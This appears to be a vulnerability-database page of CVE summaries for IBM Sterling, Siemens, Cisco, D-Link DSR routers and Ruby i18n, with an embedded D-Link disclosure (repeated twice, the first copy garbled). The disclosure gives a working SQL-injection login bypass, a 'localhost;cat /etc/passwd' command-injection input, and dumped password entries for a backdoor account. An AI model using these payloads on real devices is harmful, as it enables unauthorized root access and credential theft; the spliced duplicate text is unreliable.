VARIoT IoT vulnerabilities database

Multiple cross-site scripting (XSS) vulnerabilities in IBM Sterling B2B Integrator 5.2 and Sterling File Gateway 2.2 allow remote authenticated users to inject arbitrary web script or HTML via unspecified parameters. An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks. IBM Sterling File Gateway is a set of file transfer software that integrates different file transfer methods and can realize secure interaction through the network

Multiple cross-site scripting (XSS) vulnerabilities in IBM Sterling B2B Integrator 5.2 and Sterling File Gateway 2.2 allow remote authenticated users to inject arbitrary web script or HTML via unspecified parameters, leading to improper interaction with the Windows MHTML protocol handler. An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks. The following product versions are vulnerable: IBM Sterling B2B Integrator 5.2 IBM Sterling File Gateway 2.2. IBM Sterling File Gateway is a set of file transfer software that integrates different file transfer methods and can realize secure interaction through the network. A remote attacker can exploit this vulnerability to inject arbitrary web script or HTML with specially crafted parameters

IBM Sterling B2B Integrator 5.2 and Sterling File Gateway 2.2 do not properly restrict use of FRAME elements, which allows remote authenticated users to bypass intended access restrictions or obtain sensitive information via a crafted web site, related to a "frame injection" issue. IBM Sterling B2B Integrator and IBM Sterling File Gateway are prone to an unspecified frame-injection vulnerability. An attacker can exploit this issue to conduct phishing attacks. Successful exploits will allow the attacker to gain unauthorized access or obtain sensitive information. The following product versions are vulnerable: IBM Sterling B2B Integrator 5.2 IBM Sterling File Gateway 2.2. IBM Sterling File Gateway is a set of file transfer software that integrates different file transfer methods and can realize secure interaction through the network. The vulnerability stems from the fact that the program does not properly restrict the use of FRAME elements

Multiple SQL injection vulnerabilities in IBM Sterling B2B Integrator 5.2 and Sterling File Gateway 2.2 allow remote authenticated users to execute arbitrary SQL commands via unspecified vectors. A successful exploit may allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. IBM Sterling File Gateway is a set of file transfer software that integrates different file transfer methods and can realize secure interaction through the network. A remote attacker can exploit this vulnerability to execute arbitrary SQL commands

IBM Sterling B2B Integrator 5.2 and Sterling File Gateway 2.2 allow remote attackers to inject links and trigger unintended navigation or actions via unspecified vectors. Attackers can exploit this issue to inject arbitrary links to different pages within the application. This may allow an attacker to perform phishing attacks by presenting false information that may appear to be legitimate application pages. IBM Sterling File Gateway is a set of file transfer software that integrates different file transfer methods and can realize secure interaction through the network. A remote attacker could exploit this vulnerability to inject links and trigger users to navigate to malicious websites or perform malicious actions

IBM Sterling B2B Integrator 5.2 and Sterling File Gateway 2.2 do not invalidate a session upon a logout action, which allows remote attackers to bypass authentication by leveraging an unattended workstation. Local attackers can exploit this issue to bypass certain security restrictions and perform unauthorized actions. IBM Sterling File Gateway is a set of file transfer software that integrates different file transfer methods and can realize secure interaction through the network. A remote attacker could exploit this vulnerability to bypass authentication

Siemens SINAMICS S/G controllers with firmware before 4.6.11 do not require authentication for FTP and TELNET sessions, which allows remote attackers to bypass intended access restrictions via TCP traffic to port (1) 21 or (2) 23. Siemens SINAMICS S/G is a frequency converter developed by Siemens and is mainly used for mechanical engineering and plant construction. Siemens SINAMICS S/G are prone to a remote security bypass vulnerability. An attacker can exploit this issue to bypass certain security restrictions and execute administrative commands without proper credentials. Siemens SINAMICS S/G running firmware versions prior to 4.6.11 are vulnerable. The vulnerability stems from the fact that FTP and TELNET sessions do not perform authentication operations

The management implementation on Cisco ONS 15454 controller cards with software 9.8 and earlier allows remote attackers to cause a denial of service (card reset) via crafted packets, aka Bug ID CSCtz50902. An attacker can exploit this issue to cause the control card to reset, denying service to legitimate users. This issue is being tracked by Cisco bug IDs CSCtz50902 and CSCuh89020. Cisco ONS 15454 is a set of optical network multi-service transmission platform of American Cisco (Cisco). The platform leverages optical transport technologies such as Resilient Packet Ring (RPR), SDH, and DWDM/CWDM to integrate Ethernet, IP, storage, and TDM services to deliver next-generation voice, data services, and more. Controller Cards is one of the control cards

The runShellCmd function in systemCheck.htm in D-Link DSR-150 with firmware before 1.08B44; DSR-150N with firmware before 1.05B64; DSR-250 and DSR-250N with firmware before 1.08B44; and DSR-500, DSR-500N, DSR-1000, and DSR-1000N with firmware before 1.08B77 allows remote attackers to execute arbitrary commands via shell metacharacters in the (1) "Ping or Trace an IP Address" or (2) "Perform a DNS Lookup" section. D-Link DSR is a wireless service router product. There is a remote arbitrary command execution vulnerability in the implementation of the D-Link DSR router family. Successful use can allow an attacker to execute arbitrary commands with root privileges. The following products and versions are affected: DSR-150 with firmware version 1.08B29 and earlier; DSR-150N with firmware version 1.05B51 and earlier; DSR-250 and DSR-250N with firmware version 1.08B39 and earlier; DSR-500, DSR-500N, DSR-1000, DSR-1000N with previous firmware versions. # # CVEs: # CVE-2013-5945 - Authentication Bypass by SQL-Injection # CVE-2013-5946 - Privilege Escalation by Arbitrary Command Execution # # Vulnerable Routers: # D-Link DSR-150 (Firmware < v1.08B44) # D-Link DSR-150N (Firmware < v1.05B64) # D-Link DSR-250 and DSR-250N (Firmware < v1.08B44) # D-Link DSR-500 and DSR-500N (Firmware < v1.08B77) # D-Link DSR-1000 and DSR-1000N (Firmware < v1.08B77) # # Download URL: # http://tsd.dlink.com.tw # # Arch: # mips and armv6l, Linux # # Author: # 0_o -- null_null # nu11.nu11 [at] yahoo.com # # Date: # 2013-08-18 # # Purpose: # Get a non-persistent root shell on your D-Link DSR. # # Prerequisites: # Network access to the router ports 443 and 23. # !!! NO AUTHENTICATION CREDENTIALS REQUIRED !!! # # # A list of identified vulns follows. This list is not exhaustive as I assume # more vulns are present that just slipped my attention. # The fact that D-Link implemented a backdoor user (for what reason, please??) # and just renamed it instead of completely removing it after it was targetted # by my previous exploit, as well as the triviality of those vulns I found # makes me suggest that more vulns are present that are comparably easy to # exploit. # # Since 2013-12-03, patches are available for: # DSR-150: Firmware v1.08B44 # DSR-150N: Firmware v1.05B64 # DSR-250 and DSR-250N: Firmware v1.08B44 # DSR-500 and DSR-500N: Firmware v1.08B77 # DSR-1000 and DSR-1000N: Firmware v1.08B77 # via http://tsd.dlink.com.tw # # And now, have a worthwhile read :-) # 0. Contents: 1. Vulnerability: Authentication Bypass by SQL-Injection (CVE-2013-5945) 2. Exposure: D-Link backdoor user 4. Vulnerability: Use of weak hash algorithms 5. Exposure: Passwords are stored as plain text in config files 6. Vulnerability: Bad permissions on /etc/shadow 1. Vulnerability: Authentication Bypass by SQL-Injection (CVE-2013-5945) * Possible via the global webUI login form. * File /pfrm2.0/share/lua/5.1/teamf1lualib/login.lua contains: function login.authenticate(tablename, tableInput) local username = tableInput["Users.UserName"] local password = tableInput["Users.Password"] local cur = db.execute(string.format([[ SELECT *, ROWID AS _ROWID_ FROM %s WHERE %s = '%s' AND %s = '%s' ]], tablename, "UserName", username, "Password", password)) local result = false local statusCode = "NONE" if cur then local row = cur:fetch({}, "a") cur:close() result = row ~= nil if result == false then statusCode = "USER_LOGIN_INVALID_PASSWORD" end end return result, statusCode end * This function creates an SQL statement of the form: SELECT * FROM "Users" WHERE "UserName" = 'user' AND "Password" = 'pass'; * Since there is a default admin user account called "admin" around, this is easily exploitable by providing this to the login form: username = admin password = ' or 'a'='a * ...resulting in this SQL statement: SELECT * FROM "Users" WHERE "UserName" = 'admin' AND "Password" = '' or 'a'='a'; * Old school SQL injection. Ohh, by the way... * The same fault can be found in captivePortal.lua -- FREE NETWORKS FOR EVERYONE -- 2. * File /pfrm2.0/var/www/systemCheck.htm contains: local function runShellCmd(command) local pipe = io.popen(command .. " 2>&1") -- redirect stderr to stdout local cmdOutput = pipe:read("*a") pipe:close() return cmdOutput end if (ButtonType and ButtonType == "ping") then [...] local cmd_ping = pingprog .. " " .. ipToPing .. " " .. options1 .. " > " .. pingfile globalCmdOutput = runShellCmd (cmd_ping) statusMessage = "Pinging " .. ipToPing [...] elseif (ButtonType and ButtonType == "traceroute") then [...] local cmd = traceRouteProg .. " " .. ipToTraceRoute .. options globalCmdOutput = runShellCmd(cmd) statusMessage = "Traceroute To " .. ipToTraceRoute .. "..." [...] elseif (ButtonType and ButtonType == "dnslookup") then [...] util.appendDebugOut("Exec = " .. os.execute(nsLookupProg .. " " .. internetNameToNsLookup .. " > " .. nsLookupFile)) statusMessage = "DNS Lookup for " .. Tools like curl are not hindered by these checks. * All forms allow input like this: localhost;<command> example: localhost;cat /etc/passwd * This user provided value is then directly used as part of the input for the call to runShellCmd(c) and thus io.popen(c) in the first form section and os.execute(c) in the second form section. * Output from user provided commands gets displayed on the next page beneath the benign command output. example: [...] <textarea rows="15" name="S1" cols="60" wrap="off" class="txtbox1"> traceroute to localhost (127.0.0.1), 10 hops max, 40 byte packets 1 localhost (127.0.0.1) 0.429 ms 0.255 ms 0.224 ms root:!:0:0:root:/root:/bin/sh gkJ9232xXyruTRmY:$1$MqlhcYXP$CC3cvqpCg0RJAzV85LSeO0:0:0:root:/:/bin/sh nobody:x:0:0:nobody:/nonexistent:/bin/false ZX4q9Q9JUpwTZuo7:x:0:2:Linux User,,,:/home/ZX4q9Q9JUpwTZuo7:/bin/sh guest:x:0:1001:Linux User,,,:/home/guest:/bin/sh admin:x:0:2:Linux User,,,:/home/admin:/bin/sh &lt;/textarea&gt; [...] 3. Exposure: D-Link backdoor user: * This was the contents of my /etc/passwd after I upgraded to 1.08B39_WW: root:!:0:0:root:/root:/bin/sh gkJ9232xXyruTRmY:$1$MqlhcYXP$CC3cvqpCg0RJAzV85LSeO0:0:0:root:/:/bin/sh nobody:x:0:0:nobody:/nonexistent:/bin/false ZX4q9Q9JUpwTZuo7:x:0:2:Linux User,,,:/home/ZX4q9Q9JUpwTZuo7:/bin/sh guest:x:0:1001:Linux User,,,:/home/guest:/bin/sh admin:x:0:2:Linux User,,,:/home/admin:/bin/sh * You can see the old D-Link backdoor user name "ZX4q9Q9JUpwTZuo7". That was the account I hacked before with my previous exploit: http://www.exploit-db.com/papers/22930/ And there is a new backdoor user "gkJ9232xXyruTRmY" introduced. Instead of removing the backdoor, D-Link just created a new one. * I verified this by showing the /etc/profile: # /etc/profile LD_LIBRARY_PATH=.:/pfrm2.0/lib:/lib PATH=.:/pfrm2.0/bin:$PATH CLISH_PATH=/etc/clish export PATH LD_LIBRARY_PATH CLISH_PATH # redirect all users except root to CLI if [ "$USER" != "gkJ9232xXyruTRmY" ] ; then trap "/bin/login" SIGINT trap "" SIGTSTP /pfrm2.0/bin/cli exit fi PS1='DSR-250N> ' 4. Vulnerability: Use of weak hash algorithms: * In the /etc/shadow, salted DES hashes are used to store user passwords. Since this hash type supports at most 8 characters, users can log in by just typing the first 8 letters of their passwords when using SSH or telnet. * An effective password length limitation of 8 characters makes brute force attacks on user accounts very feasible, even if the user chose a longer password. 5. Exposure: Passwords are stored as plain text in config files: * A lookup into the system config file /tmp/teamf1.cfg.ascii, from which the /tmp/system.db is built on boot time, reveals that all user passwords are stored in plain text. Example: [...] Users = {} Users[1] = {} Users[1]["Capabilities"] = "" Users[1]["DefaultUser"] = "1" Users[1]["UserId"] = "1" Users[1]["FirstName"] = "backdoor" Users[1]["OID"] = "0" Users[1]["GroupId"] = "1" Users[1]["UserName"] = "gkJ9232xXyruTRmY" Users[1]["Password"] = "thisobviouslyisafakepass" Users[1]["UserTimeOut"] = "10" Users[1]["_ROWID_"] = "1" Users[1]["LastName"] = "ssl" [...] 6. Vulnerability: Bad permissions on /etc/shadow * This file should have 600 permissions set and not 644. It is world readable. Pointless, since every process runs as root, no user separation is done anyway. DSR-250N> ls -l -a /etc/shadow -rw-r--r-- 1 root root 115 Sep 27 15:07 /etc/shadow DSR-250N> ps PID USER VSZ STAT COMMAND 1 root 2700 S init 2 root 0 SW< [kthreadd] 3 root 0 SW< [ksoftirqd/0] 4 root 0 SW< [events/0] 5 root 0 SW< [khelper] 8 root 0 SW< [async/mgr] 111 root 0 SW< [kblockd/0] 120 root 0 SW< [khubd] 123 root 0 SW< [kseriod] 128 root 0 SW< [kslowd] 129 root 0 SW< [kslowd] 150 root 0 SW [pdflush] 151 root 0 SW [pdflush] 152 root 0 SW< [kswapd0] 200 root 0 SW< [aio/0] 210 root 0 SW< [nfsiod] 220 root 0 SW< [crypto/0] 230 root 0 SW< [cns3xxx_spi.0] 781 root 0 SW< [mtdblockd] 860 root 0 SW< [usbhid_resumer] 874 root 0 SW< [rpciod/0] 903 root 0 SWN [jffs2_gcd_mtd4] 909 root 0 SWN [jffs2_gcd_mtd5] 918 root 3596 S unionfs -s -o cow,nonempty,allow_other /rw_pfrm2.0=R 999 root 1816 S < /pfrm2.0/udev/sbin/udevd --daemon 1002 root 2988 S /pfrm2.0/bin/platformd /tmp/system.db 1003 root 3120 S /pfrm2.0/bin/evtDsptchd /tmp/system.db 1049 root 2704 S /usr/sbin/telnetd -l /bin/login 1097 root 4560 S /pfrm2.0/bin/wlanClientArlFlushd 1141 root 37000 S /pfrm2.0/bin/sshd 1154 root 3068 S /pfrm2.0/bin/linkStatusDetect /tmp/system.db WAN1 5 1255 root 3148 S /pfrm2.0/bin/nimfd /tmp/system.db 1259 root 3068 S /pfrm2.0/bin/linkStatusDetect /tmp/system.db WAN2 5 1375 root 3588 S /pfrm2.0/bin/firewalld /tmp/system.db 1560 root 0 SW< [key_timehandler] 1598 root 7776 S /pfrm2.0/bin/racoon -a 8787 -f /var/racoon_path.conf 1600 root 8036 S rvgd /tmp/system.db 1612 root 0 SW [cavium] 1621 root 8424 S vpnKAd /tmp/system.db 1685 root 5372 S /pfrm2.0/sslvpn/bin/firebase -d 1702 root 5016 S /pfrm2.0/sslvpn/bin/smm -d 1711 root 6052 S /pfrm2.0/sslvpn/bin/httpd 1712 root 2700 S /bin/sh /var/sslvpn/var/httpdKeepAlive.sh 1771 root 2680 S /pfrm2.0/bin/statusD 1933 root 3092 S /pfrm2.0/bin/loggingd /tmp/system.db 1960 root 5284 S /pfrm2.0/bin/radEap -d /tmp/system.db 1962 root 2988 S /pfrm2.0/bin/rebootd /tmp/system.db 2004 root 2988 S /pfrm2.0/bin/crond /tmp/system.db 2008 root 3260 S /pfrm2.0/bin/ntpd /tmp/system.db 2196 root 3128 S /pfrm2.0/bin/intelAmtd /tmp/system.db 2205 root 1904 S /pfrm2.0/bin/fReset 2311 root 2704 S /bin/sh /pfrm2.0/bin/release_cache.sh 2312 root 2704 S /sbin/getty -L ttyS0 115200 vt100 2463 root 3964 S /pfrm2.0/bin/dhcpd -cf /etc/dhcpd.conf.bdg30 -lf /va 2481 root 3964 S /pfrm2.0/bin/dhcpd -cf /etc/dhcpd.conf.bdg50 -lf /va 3355 root 1768 S /pfrm2.0/bin/rt2860apd 3443 root 4116 S /pfrm2.0/bin/dhcpd -cf /etc/dhcpd.conf.bdg40 -lf /va 3451 root 4116 S /pfrm2.0/bin/dhcpd -cf /etc/dhcpd.conf.bdg20 -lf /va 3457 root 3964 S /pfrm2.0/bin/dhcpd -cf /etc/dhcpd.conf.bdg1 -lf /var 3484 root 7836 S /pfrm2.0/bin/snmpd -p /var/run/snmp.pid 3518 root 4424 S /pfrm2.0/bin/openvpn --config /var/openvpn/openvpn.c 3630 root 1928 S /pfrm2.0/bin/dnsmasq --dns-forward-max=10000 --addn- 5353 root 2704 S -sh 7877 root 2568 S sleep 60 7953 root 2568 S sleep 60 8008 root 2704 R ps 16749 root 2704 S -sh 25690 root 0 SW< [RtmpCmdQTask] 25692 root 0 SW< [RtmpWscTask] DSR-250N>

Multiple SQL injection vulnerabilities in D-Link DSR-150 with firmware before 1.08B44; DSR-150N with firmware before 1.05B64; DSR-250 and DSR-250N with firmware before 1.08B44; and DSR-500, DSR-500N, DSR-1000, and DSR-1000N with firmware before 1.08B77 allow remote attackers to execute arbitrary SQL commands via the password to (1) the login.authenticate function in share/lua/5.1/teamf1lualib/login.lua or (2) captivePortal.lua. plural D-Link The product has SQL An injection vulnerability exists.Information is obtained, information is tampered with, and service operation is interrupted. (DoS) It may be put into a state. D-Link DSR is a wireless service router product. The successful use of the SQL injection vulnerability in the D-Link DSR router family enables attackers to control applications, access or modify data, and exploit other vulnerabilities in the underlying database to bypass authentication. D-Link DSR Router Series are prone to an SQL-injection vulnerability. # # CVEs: # CVE-2013-5945 - Authentication Bypass by SQL-Injection # CVE-2013-5946 - Privilege Escalation by Arbitrary Command Execution # # Vulnerable Routers: # D-Link DSR-150 (Firmware < v1.08B44) # D-Link DSR-150N (Firmware < v1.05B64) # D-Link DSR-250 and DSR-250N (Firmware < v1.08B44) # D-Link DSR-500 and DSR-500N (Firmware < v1.08B77) # D-Link DSR-1000 and DSR-1000N (Firmware < v1.08B77) # # Download URL: # http://tsd.dlink.com.tw # # Arch: # mips and armv6l, Linux # # Author: # 0_o -- null_null # nu11.nu11 [at] yahoo.com # # Date: # 2013-08-18 # # Purpose: # Get a non-persistent root shell on your D-Link DSR. # # Prerequisites: # Network access to the router ports 443 and 23. # !!! NO AUTHENTICATION CREDENTIALS REQUIRED !!! # # # A list of identified vulns follows. This list is not exhaustive as I assume # more vulns are present that just slipped my attention. # The fact that D-Link implemented a backdoor user (for what reason, please??) # and just renamed it instead of completely removing it after it was targetted # by my previous exploit, as well as the triviality of those vulns I found # makes me suggest that more vulns are present that are comparably easy to # exploit. # # Since 2013-12-03, patches are available for: # DSR-150: Firmware v1.08B44 # DSR-150N: Firmware v1.05B64 # DSR-250 and DSR-250N: Firmware v1.08B44 # DSR-500 and DSR-500N: Firmware v1.08B77 # DSR-1000 and DSR-1000N: Firmware v1.08B77 # via http://tsd.dlink.com.tw # # And now, have a worthwhile read :-) # 0. Contents: 1. Vulnerability: Authentication Bypass by SQL-Injection (CVE-2013-5945) 2. Vulnerability: Privilege Escalation by Arbitrary Command Execution (CVE-2013-5946) 3. Exposure: D-Link backdoor user 4. Vulnerability: Use of weak hash algorithms 5. Exposure: Passwords are stored as plain text in config files 6. Vulnerability: Bad permissions on /etc/shadow 1. Vulnerability: Authentication Bypass by SQL-Injection (CVE-2013-5945) * Possible via the global webUI login form. * File /pfrm2.0/share/lua/5.1/teamf1lualib/login.lua contains: function login.authenticate(tablename, tableInput) local username = tableInput["Users.UserName"] local password = tableInput["Users.Password"] local cur = db.execute(string.format([[ SELECT *, ROWID AS _ROWID_ FROM %s WHERE %s = '%s' AND %s = '%s' ]], tablename, "UserName", username, "Password", password)) local result = false local statusCode = "NONE" if cur then local row = cur:fetch({}, "a") cur:close() result = row ~= nil if result == false then statusCode = "USER_LOGIN_INVALID_PASSWORD" end end return result, statusCode end * This function creates an SQL statement of the form: SELECT * FROM "Users" WHERE "UserName" = 'user' AND "Password" = 'pass'; * Since there is a default admin user account called "admin" around, this is easily exploitable by providing this to the login form: username = admin password = ' or 'a'='a * ...resulting in this SQL statement: SELECT * FROM "Users" WHERE "UserName" = 'admin' AND "Password" = '' or 'a'='a'; * Old school SQL injection. Ohh, by the way... * The same fault can be found in captivePortal.lua -- FREE NETWORKS FOR EVERYONE -- 2. Vulnerability: Privilege Escalation by Arbitrary Command Execution (CVE-2013-5946) * Possible from the Tools --> System Check page. * File /pfrm2.0/var/www/systemCheck.htm contains: local function runShellCmd(command) local pipe = io.popen(command .. " 2>&1") -- redirect stderr to stdout local cmdOutput = pipe:read("*a") pipe:close() return cmdOutput end if (ButtonType and ButtonType == "ping") then [...] local cmd_ping = pingprog .. " " .. ipToPing .. " " .. options1 .. " > " .. pingfile globalCmdOutput = runShellCmd (cmd_ping) statusMessage = "Pinging " .. ipToPing [...] elseif (ButtonType and ButtonType == "traceroute") then [...] local cmd = traceRouteProg .. " " .. ipToTraceRoute .. options globalCmdOutput = runShellCmd(cmd) statusMessage = "Traceroute To " .. ipToTraceRoute .. "..." [...] elseif (ButtonType and ButtonType == "dnslookup") then [...] util.appendDebugOut("Exec = " .. os.execute(nsLookupProg .. " " .. internetNameToNsLookup .. " > " .. nsLookupFile)) statusMessage = "DNS Lookup for " .. internetNameToNsLookup [...] * Command injection is possible in at least these form sections: Ping or Trace an IP Address Perform a DNS Lookup * When using a browser, deactivate the "onclick" JavaScript checks using a tool like Firebug. Tools like curl are not hindered by these checks. * All forms allow input like this: localhost;<command> example: localhost;cat /etc/passwd * This user provided value is then directly used as part of the input for the call to runShellCmd(c) and thus io.popen(c) in the first form section and os.execute(c) in the second form section. * Output from user provided commands gets displayed on the next page beneath the benign command output. example: [...] <textarea rows="15" name="S1" cols="60" wrap="off" class="txtbox1"> traceroute to localhost (127.0.0.1), 10 hops max, 40 byte packets 1 localhost (127.0.0.1) 0.429 ms 0.255 ms 0.224 ms root:!:0:0:root:/root:/bin/sh gkJ9232xXyruTRmY:$1$MqlhcYXP$CC3cvqpCg0RJAzV85LSeO0:0:0:root:/:/bin/sh nobody:x:0:0:nobody:/nonexistent:/bin/false ZX4q9Q9JUpwTZuo7:x:0:2:Linux User,,,:/home/ZX4q9Q9JUpwTZuo7:/bin/sh guest:x:0:1001:Linux User,,,:/home/guest:/bin/sh admin:x:0:2:Linux User,,,:/home/admin:/bin/sh &lt;/textarea&gt; [...] 3. Exposure: D-Link backdoor user: * This was the contents of my /etc/passwd after I upgraded to 1.08B39_WW: root:!:0:0:root:/root:/bin/sh gkJ9232xXyruTRmY:$1$MqlhcYXP$CC3cvqpCg0RJAzV85LSeO0:0:0:root:/:/bin/sh nobody:x:0:0:nobody:/nonexistent:/bin/false ZX4q9Q9JUpwTZuo7:x:0:2:Linux User,,,:/home/ZX4q9Q9JUpwTZuo7:/bin/sh guest:x:0:1001:Linux User,,,:/home/guest:/bin/sh admin:x:0:2:Linux User,,,:/home/admin:/bin/sh * You can see the old D-Link backdoor user name "ZX4q9Q9JUpwTZuo7". That was the account I hacked before with my previous exploit: http://www.exploit-db.com/papers/22930/ And there is a new backdoor user "gkJ9232xXyruTRmY" introduced. Instead of removing the backdoor, D-Link just created a new one. * I verified this by showing the /etc/profile: # /etc/profile LD_LIBRARY_PATH=.:/pfrm2.0/lib:/lib PATH=.:/pfrm2.0/bin:$PATH CLISH_PATH=/etc/clish export PATH LD_LIBRARY_PATH CLISH_PATH # redirect all users except root to CLI if [ "$USER" != "gkJ9232xXyruTRmY" ] ; then trap "/bin/login" SIGINT trap "" SIGTSTP /pfrm2.0/bin/cli exit fi PS1='DSR-250N> ' 4. Vulnerability: Use of weak hash algorithms: * In the /etc/shadow, salted DES hashes are used to store user passwords. Since this hash type supports at most 8 characters, users can log in by just typing the first 8 letters of their passwords when using SSH or telnet. * An effective password length limitation of 8 characters makes brute force attacks on user accounts very feasible, even if the user chose a longer password. 5. Exposure: Passwords are stored as plain text in config files: * A lookup into the system config file /tmp/teamf1.cfg.ascii, from which the /tmp/system.db is built on boot time, reveals that all user passwords are stored in plain text. Example: [...] Users = {} Users[1] = {} Users[1]["Capabilities"] = "" Users[1]["DefaultUser"] = "1" Users[1]["UserId"] = "1" Users[1]["FirstName"] = "backdoor" Users[1]["OID"] = "0" Users[1]["GroupId"] = "1" Users[1]["UserName"] = "gkJ9232xXyruTRmY" Users[1]["Password"] = "thisobviouslyisafakepass" Users[1]["UserTimeOut"] = "10" Users[1]["_ROWID_"] = "1" Users[1]["LastName"] = "ssl" [...] 6. Vulnerability: Bad permissions on /etc/shadow * This file should have 600 permissions set and not 644. It is world readable. Pointless, since every process runs as root, no user separation is done anyway. DSR-250N> ls -l -a /etc/shadow -rw-r--r-- 1 root root 115 Sep 27 15:07 /etc/shadow DSR-250N> ps PID USER VSZ STAT COMMAND 1 root 2700 S init 2 root 0 SW< [kthreadd] 3 root 0 SW< [ksoftirqd/0] 4 root 0 SW< [events/0] 5 root 0 SW< [khelper] 8 root 0 SW< [async/mgr] 111 root 0 SW< [kblockd/0] 120 root 0 SW< [khubd] 123 root 0 SW< [kseriod] 128 root 0 SW< [kslowd] 129 root 0 SW< [kslowd] 150 root 0 SW [pdflush] 151 root 0 SW [pdflush] 152 root 0 SW< [kswapd0] 200 root 0 SW< [aio/0] 210 root 0 SW< [nfsiod] 220 root 0 SW< [crypto/0] 230 root 0 SW< [cns3xxx_spi.0] 781 root 0 SW< [mtdblockd] 860 root 0 SW< [usbhid_resumer] 874 root 0 SW< [rpciod/0] 903 root 0 SWN [jffs2_gcd_mtd4] 909 root 0 SWN [jffs2_gcd_mtd5] 918 root 3596 S unionfs -s -o cow,nonempty,allow_other /rw_pfrm2.0=R 999 root 1816 S < /pfrm2.0/udev/sbin/udevd --daemon 1002 root 2988 S /pfrm2.0/bin/platformd /tmp/system.db 1003 root 3120 S /pfrm2.0/bin/evtDsptchd /tmp/system.db 1049 root 2704 S /usr/sbin/telnetd -l /bin/login 1097 root 4560 S /pfrm2.0/bin/wlanClientArlFlushd 1141 root 37000 S /pfrm2.0/bin/sshd 1154 root 3068 S /pfrm2.0/bin/linkStatusDetect /tmp/system.db WAN1 5 1255 root 3148 S /pfrm2.0/bin/nimfd /tmp/system.db 1259 root 3068 S /pfrm2.0/bin/linkStatusDetect /tmp/system.db WAN2 5 1375 root 3588 S /pfrm2.0/bin/firewalld /tmp/system.db 1560 root 0 SW< [key_timehandler] 1598 root 7776 S /pfrm2.0/bin/racoon -a 8787 -f /var/racoon_path.conf 1600 root 8036 S rvgd /tmp/system.db 1612 root 0 SW [cavium] 1621 root 8424 S vpnKAd /tmp/system.db 1685 root 5372 S /pfrm2.0/sslvpn/bin/firebase -d 1702 root 5016 S /pfrm2.0/sslvpn/bin/smm -d 1711 root 6052 S /pfrm2.0/sslvpn/bin/httpd 1712 root 2700 S /bin/sh /var/sslvpn/var/httpdKeepAlive.sh 1771 root 2680 S /pfrm2.0/bin/statusD 1933 root 3092 S /pfrm2.0/bin/loggingd /tmp/system.db 1960 root 5284 S /pfrm2.0/bin/radEap -d /tmp/system.db 1962 root 2988 S /pfrm2.0/bin/rebootd /tmp/system.db 2004 root 2988 S /pfrm2.0/bin/crond /tmp/system.db 2008 root 3260 S /pfrm2.0/bin/ntpd /tmp/system.db 2196 root 3128 S /pfrm2.0/bin/intelAmtd /tmp/system.db 2205 root 1904 S /pfrm2.0/bin/fReset 2311 root 2704 S /bin/sh /pfrm2.0/bin/release_cache.sh 2312 root 2704 S /sbin/getty -L ttyS0 115200 vt100 2463 root 3964 S /pfrm2.0/bin/dhcpd -cf /etc/dhcpd.conf.bdg30 -lf /va 2481 root 3964 S /pfrm2.0/bin/dhcpd -cf /etc/dhcpd.conf.bdg50 -lf /va 3355 root 1768 S /pfrm2.0/bin/rt2860apd 3443 root 4116 S /pfrm2.0/bin/dhcpd -cf /etc/dhcpd.conf.bdg40 -lf /va 3451 root 4116 S /pfrm2.0/bin/dhcpd -cf /etc/dhcpd.conf.bdg20 -lf /va 3457 root 3964 S /pfrm2.0/bin/dhcpd -cf /etc/dhcpd.conf.bdg1 -lf /var 3484 root 7836 S /pfrm2.0/bin/snmpd -p /var/run/snmp.pid 3518 root 4424 S /pfrm2.0/bin/openvpn --config /var/openvpn/openvpn.c 3630 root 1928 S /pfrm2.0/bin/dnsmasq --dns-forward-max=10000 --addn- 5353 root 2704 S -sh 7877 root 2568 S sleep 60 7953 root 2568 S sleep 60 8008 root 2704 R ps 16749 root 2704 S -sh 25690 root 0 SW< [RtmpCmdQTask] 25692 root 0 SW< [RtmpWscTask] DSR-250N>

Cross-site scripting (XSS) vulnerability in exceptions.rb in the i18n gem before 0.6.6 for Ruby allows remote attackers to inject arbitrary web script or HTML via a crafted I18n::MissingTranslationData.new call. RubyGems i18n is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied input. An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. Versions prior to RubyGems i18n 0.6.6, and 0.5.1 are vulnerable. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 - ------------------------------------------------------------------------- Debian Security Advisory DSA-2830-1 security@debian.org http://www.debian.org/security/ Florian Weiemr December 30, 2013 http://www.debian.org/security/faq - ------------------------------------------------------------------------- Package : ruby-i18n Vulnerability : cross-site scripting Problem type : remote Debian-specific: no CVE ID : CVE-2013-4492 Peter McLarnan discovered that the internationalization component of Ruby on Rails does not properly encode parameters in generated HTML code, resulting in a cross-site scripting vulnerability. This update corrects the underlying vulnerability in the i18n gem, as provided by the ruby-i18n package. The oldstable distribution (squeeze) is not affected by this problem; the libi18n-ruby package does not contain the vulnerable code. For the stable distribution (wheezy), this problem has been fixed in version 0.6.0-3+deb7u1. For the unstable distribution (sid), this problem has been fixed in version 0.6.9-1. We recommend that you upgrade your ruby-i18n packages. Further information about Debian Security Advisories, how to apply these updates to your system and frequently asked questions can be found at: http://www.debian.org/security/ Mailing list: debian-security-announce@lists.debian.org -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.10 (GNU/Linux) iQEcBAEBAgAGBQJSwfRdAAoJEL97/wQC1SS+xwAH/iI7ga/tjp1b8r//lKu3BBt5 GClsPWVKd9TBEYGHTM2ipskSU9+EDOkt/vhWH9TK2C5BA0eo68b6I2Gg8Z+BQzGa SwfQmnIee/UX3gFi+mRnppyNp1WqAxEXvRNN/1JCiVevZAUEicnUx36xUn7paLIi T+I2iae9LrCrP11XtU0KzNeg3ktt5QOTvOHIjlsdXoDHqT8EzjGalk99qA4fVK0I FU2as0zhN6aZtnivhoIuc4P3u4XYoKhK7R4BL4bwW1KzSr4/LqZ2PAOLRexyWDwV HJdfcR3WyRvpuxQKVFU9XF+agjBhWU98B8BWaC7O7aTsFYpwtHdtRN6PGJgCXUA= =GovW -----END PGP SIGNATURE-----

